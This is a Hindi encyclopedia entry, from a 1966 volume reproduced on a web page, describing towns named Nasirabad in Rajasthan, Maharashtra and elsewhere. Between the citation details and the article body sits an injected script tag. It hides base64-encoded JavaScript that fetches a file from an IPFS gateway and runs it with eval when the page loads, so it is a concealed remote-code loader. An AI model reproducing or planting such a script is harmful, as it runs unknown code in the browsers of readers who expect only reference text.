नसीराबाद

अद्‌भुत भारत की खोज
नेविगेशन पर जाएँ खोज पर जाएँ
लेख सूचना
नसीराबाद
पुस्तक नाम हिन्दी विश्वकोश खण्ड 6
पृष्ठ संख्या 265
भाषा हिन्दी देवनागरी
संपादक राम प्रसाद त्रिपाठी
प्रकाशक नागरी प्रचारणी सभा वाराणसी
मुद्रक नागरी मुद्रण वाराणसी
संस्करण सन्‌ 1966 ईसवी
उपलब्ध भारतडिस्कवरी पुस्तकालय
कॉपीराइट सूचना नागरी प्रचारणी सभा वाराणसी
लेख सम्पादक कृष्णमोहन गुप्त

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

नसीराबाद, राजस्थान

स्थिति : 26° 18' उत्तरी अक्षांश तथा 74° 48' पूर्वी देशांतर। यह भारत में राजस्थान राज्य के अजमेर जिले में, अजमेर नगर से 11 मील दक्षिण, दक्षिण-पूर्व खुले एवं शुष्क मैदान में स्थित प्रसिद्ध नगर है। मक्का, बाजरा, कोदो तथा गेहूँ की यहाँ मंडी है। हाथ से वस्त्र बनाना यहाँ का प्रमुख उद्योग है। यहाँ से अभ्रक बाहर भेजा जाता है। यहाँ की जलप्रणाली उत्तम है। परंतु वर्षा की मात्रा कम रहती है। सेना के पड़ाव की दृष्टि से इसका विशेष महत्व हो गया है। यहाँ बहुत अधिक संख्या में सेना रहती है।

नसीराबाद, महाराष्ट्र

स्थिति : 21° 0' उत्तरी अक्षांश तथा 75° 40' पूर्वी देशांतर। यह नगर महाराष्ट्र में है जो जलगाँव से पाँच मील पूर्व में स्थित है। यहाँ कपास, मक्का और गेहूँ की मंडी है, तथा चूड़ी बनाने और बिनौला निकालने के उद्योग विकसित हैं।

नसीराबाद (ईरान)

ईरान में भी इसी नाम का एक प्रसिद्ध स्थान है तथा पूर्वी पाकिस्तान में मैमनसिंह जिले में भी इसी नाम का प्रसिद्ध नगर है।


टीका टिप्पणी और संदर्भ